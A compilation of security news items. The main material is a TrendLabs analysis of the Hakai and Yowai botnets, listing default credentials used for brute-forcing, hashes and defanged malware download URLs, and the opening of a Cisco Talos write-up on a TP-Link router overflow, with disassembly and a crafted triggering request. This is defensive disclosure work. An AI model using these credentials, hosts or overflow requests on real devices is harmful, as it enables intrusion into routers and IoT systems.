  • A recently released list of top out-of-date (aka vulnerable) applications installed on computer systems include a number of Adobe products, Skype, Firefox, and VLC. If you have any of these installed, now is a good time to update them. (Source: Help Net Security)
  • Automatic license plate recognition (ALPR)—or automatic number plate recognition (ANPR) in the UK—are cameras that track license plates. And some of them are connected to the Internet, leaking sensitive data and vulnerable to attacks. (Source: TechCrunch)
  • Because of authentication weaknesses in GoDaddy, the world’s largest domain name registrar, disruptive spam, malware, and phishing campaigns taking advantage of dormant web sites owned by trusted brands are possible. (Source: KrebsOnSecurity)
  • Japanese car manufacturer, Mitsubishi, has created its own cybersecurity technology for cars, which is inspired by defenses designed for systems in critical infrastructures. (Source: Security Week)
  • Researchers from the Cyprus University of Technology, the University of Alabama at Birmingham, Telefonica Research, and Boston University, authored a paper and created a deep learning classifier algorithm that protects children from videos in YouTube by detecting disturbing content. (Source: Bleeping Computer)
  • A new voicemail phishing campaign that uses recorded messages attached to emails are fooling recipients into verifying their passwords twice to confirm the legitimacy of credentials. (Source: Bleeping Computer)
  • A convincing new attack abusing the App Engine Google Cloud Platform (GCP) comes to light, which is found to be targeting mostly organizations in the financial sector. The Cobalt Strike group is behind this campaign. (Source: Dark Reading)

Stay safe, everyone!

The post A week in security (January 21 – 27) appeared first on Malwarebytes Labs.

DailyMotion Victim of Credential Stuffing Attack

Popular video sharing platform DailyMotion announced it has become the victim of a credential stuffing attack. According to an email

DailyMotion Victim of Credential Stuffing Attack on Latest Hacking News.

Meet Aztarna, a tool to find vulnerable Internet connected robots

By Waqas

The company behind Aztarna is Alias Robotics, a cyber-security startup. Manufacturers and users of IoT robots should breathe a sigh of relief that the cyber-security startup Alias Robotics has developed a robot scanning tool that can track any robot connected to the internet and powered by any robotic technology such as ROS or SROS. Dubbed Aztarna […]

This is a post from HackRead.com Read the original post: Meet Aztarna, a tool to find vulnerable Internet connected robots

Google Chrome to Get Drive-by Download Protection

Engineers at Google are working on drive-by download protection for Chromium. Googles Chrome browser is based on the open-source engine

Google Chrome to Get Drive-by Download Protection on Latest Hacking News.

Critical Vulnerability Patched In Check Point ZoneAlarm Antivirus Software

Check Point Software Technologies has recently fixed a critical security vulnerability in their antivirus software ZoneAlarm. As pointed out by

Critical Vulnerability Patched In Check Point ZoneAlarm Antivirus Software on Latest Hacking News.

Cisco Patched Multiple Security Vulnerabilities In SD-WAN Solution

Cisco has recently rolled out fixes for multiple vulnerabilities found in its SD-WAN Solution. These include one critical and numerous

Cisco Patched Multiple Security Vulnerabilities In SD-WAN Solution on Latest Hacking News.

TrendLabs Security Intelligence Blog: ThinkPHP Vulnerability Abused by Botnets Hakai and Yowai

By Augusto Remillano II

Cybercriminals are exploiting a ThinkPHP vulnerability — one that was disclosed and patched in December 2018 — for botnet propagation by a new Mirai variant we’ve called Yowai and Gafgyt variant Hakai. Cybercriminals use websites created using the PHP framework to breach web servers via dictionary attacks on default credentials and gain control of these routers for distributed denial of service attacks (DDoS). Our telemetry showed that these two particular malware types caused a sudden increase in attacks and infection attempts from January 11 to 17.

Analyzing Mirai variant Yowai

We observed that Yowai (detected by Trend Micro as BACKDOOR.LINUX.YOWAI.A) has a configuration table that’s similar to those of other Mirai variants. Its configuration table can be decrypted with the same procedures, and adds the ThinkPHP exploit with other known vulnerabilities in its list of infection entry vectors.

Yowai listens on port 6 to receive commands from the command and control (C&C) server. After it infects a router, it uses dictionary attack in an attempt to infect other devices. The affected router now becomes part of a botnet that enables its operator to use the affected devices for launching DDoS attacks.

Using a number of exploits to supplement its dictionary attack, Yowai displays a message on the user’s console once executed. Our analysis found that it also references a kill list of competing botnets that it will eradicate from the system.

Figure 1. Console display on a Yowai-infected device

Username / passwords for dictionary attack Kill list
OxhlwSG8
defaulttlJwpbo6S2fGqNFsadmin

daemon

12345

guest

support

4321

root

vizxv

t0talc0ntr0l4!

bin

adm

synnet

dvrhelper, mirai, light, apex, Tsunami, hoho, nikki, miori, hybrid, sora, yakuza, kalon, owari, gemini, lessie, senpai, apollo, storm, Voltage, horizon, meraki, Cayosin, Mafia, Helios, Sentinel, Furasshu, love, oblivion, lzrd, yagi, dark, blade, messiah, qbot, modz, ethereal, unix, execution, galaxy, kwari, okane, osiris, naku, demon, sythe, xova, tsunami, trinity, BUSHIDO, IZ1H9, daddyl33t, KOWAI-SAD, ggtr, QBotBladeSPOOKY, SO190Ij1X, hellsgate, sysupdater, Katrina32

Table 1. List of default usernames and passwords used by Yowai for a dictionary attack and a kill list of competing botnets it removes from the system

Aside from exploiting the ThinkPHP vulnerability, the sample of Yowai we examined exploited vulnerabilities CVE-2014-8361, a Linksys RCE, CVE-2018-10561, CCTV-DVR RCE.

Figure 2. ThinkPHP vulnerability

Hakai’s routine

Gafgyt variant botnet Hakai was previously seen infecting internet of things (IoT) devices and relied on router vulnerabilities for propagation. The Hakai (detected by Trend Micro as BACKDOOR.LINUX.HAKAI.AA) sample we observed explored flaws that may have remained unpatched in systems and added exploits for vulnerabilities in ThinkPHP, D-Link DSL-2750B router vuln, CVE-2015-2051, CVE-2014-8361, and CVE-2017-17215 to propagate and perform various DDoS attacks.

Figure 3. Hakai scans for vulnerable routers

Figure 4. ThinkPHP exploit

Interestingly, the Hakai sample we examined contained codes copied from Mirai, specifically the functions used for encrypting its configuration table. However, the functions we’ve identified are not operational, we suspect that the codes for telnet dictionary attack were intentionally removed to make this Hakai variant stealthier.

Since Mirai variants typically kill competing botnets, it may be advantageous for this Hakai variant to avoid targeting IoT devices that use default credentials. The approach of solely using exploits for propagation is harder to detect compared to telnet bruteforcing, which likely explains the spike we observed in attack attempts from our detection and blocking technology.

Figure 5. Some of the code copied from Mirai

Figure 6. The Hakai sample that we observed not using the codes copied from Mirai

 

Conclusion

Given ThinkPHP is a free open source PHP framework popular among developers and companies for its simplified functions and ease of use, Hakai and Yowai can easily be abused by cybercriminals to breach web servers and attack websites. And as more botnet codes are available and exchanged online, we expect to see even competing botnets having similar codes with each other for even more intrusions. Further, we can expect cybercriminals to continue working on Mirai-like botnets and exploring more entry channels and Mirai variants as they develop the resilience of malware attacks to go after the increasing number of IoT devices released with default credentials. In general, IoT device users should update their devices to the manufacturer’s latest released versions to patch any exploitable vulnerability. Users should also frequently change their device passwords to complicated iterations to thwart unauthorized login attempts.

 

Trend Micro Solutions

These threats are addressed by the following Trend Micro products:

Trend Micro Smart Home Network™

  • 1058814 WEB Linksys WRT120N tmUnblock Buffer Overflow (EDB-31758)
  • 1059669 WEB D-Link Multiple Routers HNAP Protocol Security Bypass Vulnerability (BID-

37690)

  • 1133650 WEB Multiple CCTV-DVR Vendors Remote Code Execution
  • 1134286 WEB Realtek SDK Miniigd UPnP SOAP Command Execution (CVE-2014-8361)
  • 1134287 WEB Huawei Home Gateway SOAP Command Execution (CVE-2017-17215)
  • 1134610 WEB Dasan GPON Routers Command Injection -1.1 (CVE-2018-10561)
  • 1134677 WEB D-Link DSL-2750B OS Command Injection
  • 1135215 WEB ThinkPHP Remote Code Execution

Trend Micro™ Deep Discovery™

  • 2452 Wget Commandline Injection
  • 2621 Remote Code Execution – HTTP (Request)
  • 2630 HNAP1 Remote Code Execution Exploit – HTTP (Request)
  • 2639 CVE-2018-10562 – GPON Remote Code Execution – HTTP (Request)
    • CVE-2018-10562 is an RCE using the CVE-2018-10561 unauthentication vulnerability
  • 2692 LINKSYS Unauthenticated Remote Code Execution Exploit – HTTP (Request)
  • 2707 DLINK Command Injection Exploit – HTTP (Request) – Variant 2
  • 2786 ThinkPHP 5x Remote Code Execution – HTTP (Request)

 

Indicators of Compromise

HAKAI
SHA256 Detection
402f7be58a8165c39e95b93334a706ec13fe076a2706d2c32d6360180bba0a74 Backdoor.Linux.HAKAI.AA
76af2c3ff471916bc247e4c254c9b2affa51edb7e1a18825f36817e8c5921812
7bd284f4da09d3a95472a66e0867d778eeb59ed54738f6fb6e417e93c0b65685
f693442a7e30876b46fd636d9df25495261be5c1a4f7b13e0fe5afc1b908e774
YOWAI
2e66ee1b4414fe2fb17da4372c43a826dd7767c189120eafd427773769302e35 Backdoor.Linux.YOWAI.A

 

Malicious URLs

185[.]244.25[.]168:52

185[.]244.25[.]168/mips

185[.]244.25[.]168/x86

185[.]244.25[.]168/OwO/Tsunami.mips

185[.]244.25[.]168/x86/mipsel

185[.]244.25[.]221/bins/Yowai.mips

185[.]244.25[.]221/bins/Yowai.mpsl

185[.]244.25[.]221/bins/Yowai.x86

185[.]244.25[.]221/Yowai.mips

The post ThinkPHP Vulnerability Abused by Botnets Hakai and Yowai appeared first on .



TrendLabs Security Intelligence Blog

Researcher warns of privilege escalation flaw in Check Point ZoneAlarm

Illumant researcher Chris Anastasio has discovered a serious vulnerability in Check Point’s security software. It affects ZoneAlarm Free Firewall and ZoneAlarm Free Antivirus + Firewall and, if exploited, it may allow a malicious user with low privilege access to escalate privileges to SYSTEM level. WCF and self-signed code in the spotlight The vulnerability is due to insecure implementation of services developed using Windows Communication Foundation or “WCF.” It targets a .NET service in ZoneAlarm that … More

The post Researcher warns of privilege escalation flaw in Check Point ZoneAlarm appeared first on Help Net Security.

Hacker demonstrates how to remotely Jailbreak iPhone X

By Waqas

A China-based security researcher associated with the Qihoo 360 Vulcan Team has published a proof-of-concept exploit for a kernel vulnerability, which he claims to be the second stage of an exploit chain that he was successfully able to jailbreak iPhone X remotely. The researcher Qixun Zhao posted the PoC on Twitter from his Twitter handle […]

This is a post from HackRead.com Read the original post: Hacker demonstrates how to remotely Jailbreak iPhone X

Millions of PCs Found Running Outdated Versions of Popular Software

It is 2019, and millions of computers still either have at least one outdated application installed or run outdated operating systems, making themselves vulnerable to online threats and known security vulnerabilities/exploits. Security vendor Avast has released its PC Trends Report 2019 revealing that millions of users are making themselves vulnerable to cyber attacks by keeping outdated

Cisco fixes security holes in SD-WAN, Webex, Small Business routers

Cisco has fixed a heap of security holes in a variety of its products, including a critical one affecting its SD-WAN Solution. Cisco SD-WAN vulnerabilities The most critical among the flaws fixed are a buffer overflow vulnerability (CVE-2019-1651) and a high risk unauthorized access flaw (CVE-2019-1647) affecting any Cisco vSmart Controller Software versions running a release of the Cisco SD-WAN Solution prior to 18.4.0. CVE-2019-1651 could be exploited by sending a malicious file to an … More

The post Cisco fixes security holes in SD-WAN, Webex, Small Business routers appeared first on Help Net Security.

Chinese Hacker Publishes PoC for Remote iOS 12 Jailbreak On iPhone X

Here we have great news for all iPhone Jailbreak lovers and concerning one for the rest of iPhone users. A Chinese cybersecurity researcher has today revealed technical details of critical vulnerabilities in Apple Safari web browser and iOS that could allow a remote attacker to jailbreak and compromise victims' iPhoneX running iOS 12.1.2 and before versions. To do so, all an attacker needs to

Adobe Released Another Patch – This Time For Adobe Experience Manager

This month, Adobe released patches for various products multiple times. However, it seems the vulnerabilities continue to appear in Adobe

Adobe Released Another Patch – This Time For Adobe Experience Manager on Latest Hacking News.

Securing Government Data with NIST 800-53

If you have ever heard of the Federal Information Security Management Act, then you are aware of the work done by the National Institute of Standards and Technology. The goal of the Act, not to  mention the subsequent documents that resulted from strategies designed around implementing it, led NIST to create works designed to bolster […]… Read More

The post Securing Government Data with NIST 800-53 appeared first on The State of Security.

Critical RCE Flaw in Linux APT Allows Remote Attackers to Hack Systems

Just in time… Some cybersecurity experts this week arguing over Twitter in favor of not using HTTPS and suggesting software developers to only rely on signature-based package verification, just because APT on Linux also does the same. Ironically, a security researcher just today revealed details of a new critical remote code execution flaw in the apt-get utility that can be exploited by a

ThreadX WiFi Firmware Vulnerability Affects Smartphones, Laptops, Gaming Devices, and Routers

A researcher has found several security vulnerabilities in ThreadX WiFi firmware. He discovered these vulnerabilities in the firmware running on

ThreadX WiFi Firmware Vulnerability Affects Smartphones, Laptops, Gaming Devices, and Routers on Latest Hacking News.

Unauthorised Remote Access Vulnerability Discovered on Cisco Small Business Switches

Businesses using Cisco Small Business 200 Series Smart Switches; CSB 300 Series Managed Switches;  Cisco 250 Series Smart Switches; CSB

Unauthorised Remote Access Vulnerability Discovered on Cisco Small Business Switches on Latest Hacking News.

Vulnerability In Telegram Bot API Encryption Allows Access To Messages

Researchers have discovered a serious security vulnerability in the popular messaging Telegram. The vulnerability mainly exists in the Telegram Bot

Vulnerability In Telegram Bot API Encryption Allows Access To Messages on Latest Hacking News.

ES File Explorer Vulnerability Exposed Files Saved On a Victim Android Phone

Researchers have spotted a vulnerability in the popular file manager among Android users, ES File Explorer. The vulnerability could allow

ES File Explorer Vulnerability Exposed Files Saved On a Victim Android Phone on Latest Hacking News.

Active Exploits Of ThinkPHP Vulnerability Found Even After Patch

In December 2018, we witnessed active exploits of a ThinkPHP vulnerability. After the discoverers of this flaw posted its PoC,

Active Exploits Of ThinkPHP Vulnerability Found Even After Patch on Latest Hacking News.

Bug in widespread Wi-Fi chipset firmware can lead to zero-click code execution

A vulnerability in the firmware of a Wi-Fi chipset that is widely used in laptops, streaming, gaming and a variety of “smart” devices can be exploited to compromise them without user interaction. The research and the discovered flaws The discovery was made by Embedi researcher Denis Selianin, who decided to first analyze the code of the Marvell Avastar Wi-Fi driver code, which loads firmware to Wi-Fi SoC (system on chip), and then to engage in … More

The post Bug in widespread Wi-Fi chipset firmware can lead to zero-click code execution appeared first on Help Net Security.

The Collection #1 Data Breach: Insights and Tips on This Cyberthreat

As the cybersecurity landscape evolves to match new trends in technology, it’s important for consumers to prioritize the protection of their online presence. That means remaining aware of the internet’s more common cyberthreats, including malware, phishing, and data breaches, and how they could potentially affect you. And while most of us already know about the Equifax data breach, a new monster breach now has to become top of mind for us all. Say hello to Collection #1, a data set exposing 772,904,991 unique email addresses and over 21 million unique passwords.

Discovered by security researcher Troy Hunt, Collection #1 first appeared on the popular cloud service called MEGA. The Collection #1 folder held over 12,000 files that weigh in at over 87 gigabytes. When the storage site was taken down, the folder was then transferred to a public hacking site. What’s truly astonishing about this is that the data was not for sale; it was simply available for anyone to take.

You may be wondering, how was all this data collected? It appears that this data was comprised of a breach of breaches, aggregating over 2,000 leaked databases containing cracked passwords, in order to achieve maximum exposure. The sheer volume of this breach makes Collection #1 the second largest in size to Yahoo, and the largest public breach ever (given the data was openly exposed on the internet).

It appears that this data set is designed for use in credential-stuffing attacks, where cybercriminals will use email and password combinations to hack into consumers’ online accounts. The risks could be even greater for those who reuse credentials across multiple accounts. In order to help protect yourself from this threat, it’s vital that users act fast and use the following tips to help protect their data:

  • Use strong, unique passwords. In addition to making sure all of your passwords are strong and unique, never reuse passwords across multiple accounts. You can also enable a password manager to help keep track of your credentials.
  • Change your passwords. Even if it doesn’t appear that your data was breached, it’s better to err on the side of caution and change all of your passwords to better protect yourself.
  • Enable two-factor authentication. While a strong and unique password is a good first line of defense, enabling app-based two-factor authentication across your accounts will help your cause by providing an added layer of security.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post The Collection #1 Data Breach: Insights and Tips on This Cyberthreat appeared first on McAfee Blogs.

Twitter Android App Bug Revealed Private Tweets Spanning Five Years

Social media giant Twitter has just announced a bug fix that has been affecting users of its Android App. However,

Twitter Android App Bug Revealed Private Tweets Spanning Five Years on Latest Hacking News.

Frequent Fortnite Player? 4 Tips to Combat the New Attack on User Accounts

Epic Games’ Fortnite has risen in popularity rapidly since its debut, and cybercriminals have leveraged that popularity to enact a handful of malicious schemes. Unfortunately, these tricks are showing no signs of slowing, as researchers recently discovered a security flaw that allowed cybercriminals to take over a gamer’s Fortnite account through a malicious link. This attack specifically targeted users who used a third-party website to log in to their Fortnite accounts, such as Facebook, Google, or gaming providers like Microsoft, Nintendo, and Sony. But instead of trying to steal a gamer’s password like many of the hacks we’ve seen, this scheme targeted the special access token the third-party website exchanges with the game when a user logs in.

So, how exactly does this threat work? First, a cybercriminal sends a malicious phishing link to a Fortnite user. To increase the likelihood that a user will click on the link, the cybercriminal would send the link with an enticing message promising perks like free game credits. If the user clicked on the link, they would be redirected to the vulnerable login page. From here, Epic Games would make the request for the SSO (single sign-on) token from the third-party site, given SSO allows a user to leverage one set of login credentials across multiple accounts. This authentication token is usually sent to Fortnite over the back-end, removing the need for the user to remember a password to access the game. However, due to the unsecured login page, the user would be redirected to the attacker’s URL. This allows cybercriminals to intercept the user’s login token and take over their Fortnite account.

After acquiring a login token, a cybercriminal would gain access to a Fortnite user’s personal and financial details. Because Fortnite accounts have partial payment card numbers tied to them, a cybercriminal would be able to make in-game purchases and rack up a slew of charges on the victim’s card.

It’s important for players to understand the realities of gaming security in order to be more prepared for potential cyberthreats such as the Fortnite hack. According to McAfee research, the average gamer has experienced almost five cyberattacks, with 75% of PC gamers worried about the security of gaming. And while Epic Games has thankfully fixed this security flaw, there are a number of techniques players can use to help safeguard their gaming security now and in the future:

  • Go straight to the source70% of breaches start with a phishing email. And phishing scams can be stopped by simply avoiding the email and going straight to the source to be sure you’re working with the real deal. In the case of this particular scheme, you should be able to check your account status on the Fortnite website and determine the legitimacy of the request from there.
  • Use a strong, unique password. If you think your Fortnite account was hacked, err on the side of caution by updating your login credentials. In addition, don’t reuse passwords over multiple accounts. Reusing passwords could allow a cybercriminal to access multiple of your accounts by just hacking into one of them.
  • Stay on top of your financial transactions. Check your bank statements regularly to monitor the activity of the card linked to your Fortnite account. If you see repeat or multiple transactions from your account, or see charges that you don’t recognize, alert your bank to ensure that your funds are protected.
  • Get protection specifically designed for gamers. We’re currently building McAfee Gamer Security to help boost your PC’s performance, while simultaneously safeguarding you from a variety of threats that can disrupt your gaming experience.

And, as always, stay on top of the latest consumer and mobile security threats by following @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Frequent Fortnite Player? 4 Tips to Combat the New Attack on User Accounts appeared first on McAfee Blogs.

Watch as hackers take over a construction crane

By Waqas

Trend Micro Researchers Prove How Easy it is Hackers to Hack a Construction Crane and Cause Destruction. Hacking a crane at a construction site might seem to you like an impossible act from cybercriminals. It just appears so unbelievable. After all, what would they get by hacking a crane? However, researchers at Trend Micro, a […]

This is a post from HackRead.com Read the original post: Watch as hackers take over a construction crane

Smashing Security #111: When rivals hack, and ‘extreme’ baby monitors

Smashing Security #111: When rivals hack, and 'extreme' baby monitors

Why a business spat resulted in Liberia falling off the internet, how the US Government shutdown is impacting website security, and the perplexing world of extreme IoT devices.

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by special guest Zoë Rose.

Malware can fully compromise building control systems

By Waqas

Enterprise security vendor ForeScout’s operational technology research unit has developed a PoC (Proof-of-Concept) malware that exposed the vulnerabilities in building automation systems (BAS) by compromising them due to the presence of two very critical bugs in the BAS’s PLC (programmable logic controller). ForeScout researchers claim that the first of the two bugs use a hard-coded secret when the […]

This is a post from HackRead.com Read the original post: Malware can fully compromise building control systems

Flight Booking System Flaw Affected Customers of 141 Airlines Worldwide

Almost half of the fight travelers around the world were found exposed to a critical security vulnerability discovered in online flight ticket booking system that allowed remote hackers to access and modify their travel details and even claim their frequent flyer miles. Israeli network security researcher Noam Rotem discovered the vulnerability when he booked a flight on the Israeli airline

5 Popular Web Hosting Services Found Vulnerable to Multiple Flaws

A security researcher has discovered multiple one-click client-side vulnerabilities in the some of the world's most popular and widely-used web hosting companies that could have put millions of their customers as well as billions of their sites' visitors at risk of hacking. Independent researcher and bug-hunter Paulos Yibelo, who shared his new research with The Hacker News, discovered roughly

Vulnerability Deep Dive: TP-Link TL-R600VPN remote code execution vulnerabilities

Vulnerability discovery and research by Jared Rittle and Carl Hurd of Cisco Talos.



Introduction


TP-Link recently patched three vulnerabilities in their TL-R600VPN gigabit broadband VPN router, firmware version 1.3.0. Cisco Talos publicly disclosed these issues after working with TP-Link to ensure that a patch was available. Now that a fix is out there, we want to take the time to dive into the inner workings of these vulnerabilities and show the approach we took with our proof-of-concept code.

Background


The TP-Link TL-R600VPN is a five-port small office/home office (SOHO) router. This device contains a Realtek RTL8198 integrated system on a chip. This particular chip uses an offshoot of the MIPS-1 architecture developed by Lexra. Except for a few proprietary instructions for handling unaligned load and store operations, these two instruction sets are essentially the same. The instructions that are not included in Lexra are LWL, SWL, LWR, and SWR. These proprietary instructions are often used when compiling a program for the more common MIPS-1 architecture and cause a segfault when encountered in Lexra. The knowledge of this key difference is imperative to assembling working code for the target.

For more information about Lexra MIPS and its differences with the MIPS-1 architecture, refer to 'The Lexra Story' and the MIPS-1 patent filing.


Recon

Understanding the vulnerability


The device contains a vulnerability in the way that the HTTP server handles requests to the /fs/ directory, allowing an authenticated attacker to remotely execute code on the device.

When accessing any of the following pages in the /fs/ directory, the application incorrectly parses the passed HTTP header.

  • http://<router_ip>/fs/help
  • http://<router_ip>/fs/images
  • http://<router_ip>/fs/frames
  • http://<router_ip>/fs/dynaform
  • http://<router_ip>/fs/localiztion (NOTE: this is not a typo)

In the function 'httpGetMimeTypeByFileName', the web server attempts to parse the file extension of the requested page to determine its mime type. During this processing, the server uses a strlen() call to determine the length of the requested page name, seeks to the end of that heap-allocated string, and reads the file extension backwards until it encounters a period (0x2e).
## calculates the length of the uri and seeks to the end#LOAD:00425CDC loc_425CDC:LOAD:00425CDC                 la $t9, strlenLOAD:00425CE0                 sw $zero, 0x38+var_20($sp)LOAD:00425CE4                 jalr $t9 ; strlenLOAD:00425CE8                 sh $zero, 0x38+var_1C($sp)LOAD:00425CEC                 addu $s0, $v0
# looks for a period at the current index and break out when foundLOAD:00425CF0                 li $v0, 0x2E            LOAD:00425CF4                 lbu $v1, 0($s0)LOAD:00425CF8                 lw $gp, 0x38+var_28($sp)LOAD:00425CFC                 beq $v1, $v0, loc_425D14LOAD:00425D00                 li $v1, 0b101110LOAD:00425D04
# loop backwards until a period is found, loading the character into $s0LOAD:00425D04 loc_425D04:                                                LOAD:00425D04                 addiu $s0, -1LOAD:00425D08                 lbu $v0, 0($s0)             LOAD:00425D0C                 bne $v0, $v1, loc_425D04LOAD:00425D10                 nop

There should always be an extension on the requested page, preventing the vulnerable case from occurring. This can be seen in the GDB strings output below for the non-malicious page /web/dynaform/css_main.css where the file extension 'css' will be parsed out.

0x67a170:        "/web/dynaform/css_main.css"
0x67a18b:        "46YWRtaW4="
0x67a196:        "\nConnection: close\r\n\r\nWRtaW4=\r\nConnection: close\r\n\r\n6YWRtaW4=\r\nConnection: close\r\n\r\n46YWRtaW4=\r\nConnection: close\r\n\r\ntaW4=\r\nConnection: close\r\n\r\n http://192.168.0.1/\r\nAuthorization: Basic YWRtaW46YWRt"...
0x67a25e:        "aW4=\r\nConnection: close\r\n\r\nnnection: close\r\n\r\n"
0x67a28d:        ""
0x67a28e:        ""
0x67a28f:        ""
0x67a290:        ""


If, however, we request one of the vulnerable pages we can see that the URI that gets parsed does not contain a period (0x2e). Due to this, the application will continue to search backwards until a period is reached. In this case, there is not a period between the URI being parsed and the raw GET request data stored earlier on the heap (shown below at address 0x679960), allowing us to seek backwards into our payload. This can be seen at address 0x67a170 in the GDB strings output below for the malicious page /fs/help where no file extension is being parsed.

...
0x679960:        "/fs/help"
0x679969:        "elp"
0x67996d:        "HTTP/1.1"
0x679976:        "\n"
0x679978:        "ost: 192.168.0.1\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q"...
0x679a40:        "=0.5\r\nAccept-Encoding: gzip, deflate\r\nAuthorization: Basic YWRtaW46YWRtaW4=\r\nConnection: close\r\nUpgrade-Insecure-Requests: 1\r\n\r\n"                                                   
0x679ac1:        ""
0x679ac2:        ""
0x679ac3:        ""
0x679ac4:        ""
0x679ac5:        ""
...
0x67a165:        "gp"
0x67a169:        ""
0x67a16a:        "\b"
0x67a16c:        ""
0x67a16d:        ""
0x67a16e:        ""
0x67a16f:        ""
0x67a170:        "/web/help"
0x67a17a:        "secure-Requests"
0x67a18a:        " 1"
0x67a18d:        "\n\r\nure-Requests: 1\r\n\r\nclose\r\nUpgrade-Insecure-Requests: 1\r\n\r\nUpgrade-Insecure-Requests: 1\r\n\r\n\nUpgrade-Insecure-Requests: 1\r\n\r\nsic YWRtaW46YWRtaW4=\r\nConnection: close\r\nUpgrade-Insecure-Requests: 1\r\n\r\na"...
0x67a255:        "tion: Basic YWRtaW46YWRtaW4=\r\nConnection: close\r\nUpgrade-Insecure-Requests: 1\r\n\r\nure-Requests: 1\r\n\r\n"
0x67a2ba:        ""
0x67a2bb:        ""
0x67a2bc:        ""
...

When a period is encountered, in either the expected file extension or the vulnerable case, the extracted string is processed by the toUpper() function, character by character, in the loop. The result of this operation is then written to a stack-based buffer by a store byte instruction. This can be seen in the instructions pulled from the aforementioned loop, which can be seen below.

#
# loads parsed data onto stack via a store byte call from $s0 register
#
LOAD:00425D20 loc_425D20:
LOAD:00425D20                 lbu $a0, 0($a0)


# returns an uppercase version of the character where possible
LOAD:00425D24                 jalr $t9 ; toUpper             
LOAD:00425D28                 nop


# $gp references $s2, the place for the next char on the stack buffer
LOAD:00425D2C                 lw $gp, 0x38+var_28($sp)
            
# stores the character into $s2
LOAD:00425D30                 sb $v0, 0($s2)             
LOAD:00425D34


# calculates the length of the entire user-supplied string
LOAD:00425D34 loc_425D34:
LOAD:00425D34                 la $t9, strlen
LOAD:00425D38                 jalr $t9 ; strlen
                    
# place a pointer to the parsed data into arg0
LOAD:00425D3C                 move $a0, $s0             
LOAD:00425D40                 addiu $v1, $sp, 0x38+var_20
LOAD:00425D44                 lw $gp, 0x38+var_28($sp)
LOAD:00425D48                 sltu $v0, $s1, $v0
LOAD:00425D4C                 addu $a0, $s0, $s1
LOAD:00425D50                 addu $s2, $v1, $s1
LOAD:00425D54                 la $t9, toupper


The program continues execution until it reaches the httpGetMimeTypeByFileName function epilogue where the return address and five registers are loaded from their saved values on the stack. When the vulnerability is being exploited, these saved values have been overwritten from their normal data to contain the addresses of the gadgets described later.

#
# registers get overwritten with saved values on the stack
#
LOAD:00425DB4 loc_425DB4:
LOAD:00425DB4
LOAD:00425DB4                 lw $ra, 0x38+var_4($sp)
LOAD:00425DB8                 lw $s4, 0x38+var_8($sp)
LOAD:00425DBC                 lw $s3, 0x38+var_C($sp)
LOAD:00425DC0                 lw $s2, 0x38+var_10($sp)
LOAD:00425DC4                 lw $s1, 0x38+var_14($sp)
LOAD:00425DC8                 lw $s0, 0x38+var_18($sp)
LOAD:00425DCC                 jr $ra             
LOAD:00425DD0                 addiu $sp, 0x38
LOAD:00425DD0  # End of function httpGetMimeTypeByFileName


At this point in the function epilogue, the loop copying data to a set buffer has overwritten the original data on the stack. By popping the data off of the stack that the program expects to be unmodified, the user gains control of the return address. This also means the user has the ability to remotely execute code in the context of the HTTPD process.

toUpper() filter


During the initial parsing of the HTTP header, the device iterates over each byte searching for a period (0x2e) and building a buffer. After a period is encountered, the buffer is passed to a toUpper() call, converting each ASCII character in the buffer to its uppercase equivalent.

LOAD:00425D20 loc_425D20:
LOAD:00425D20                 lbu $a0, 0($a0)
# returns an upper case version of the character where possible
LOAD:00425D24                 jalr $t9 ; toUpper             
LOAD:00425D28                 nop

This creates a problem when attempting to send shellcode via the HTTP header, as there is no way to avoid the toUpper() call, preventing the use of any lowercase characters. Take the GET request below, for example.

GET /fs/help HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Content-Length: 2
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4=
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Length: 4


We can see that the 'a' characters (0x61) in our header have been converted to their uppercase version (0x41) by looking at the registers just before the final jump in the httpGetMimeTypeByFileName function epilogue is executed.


(GDB) i r

i r

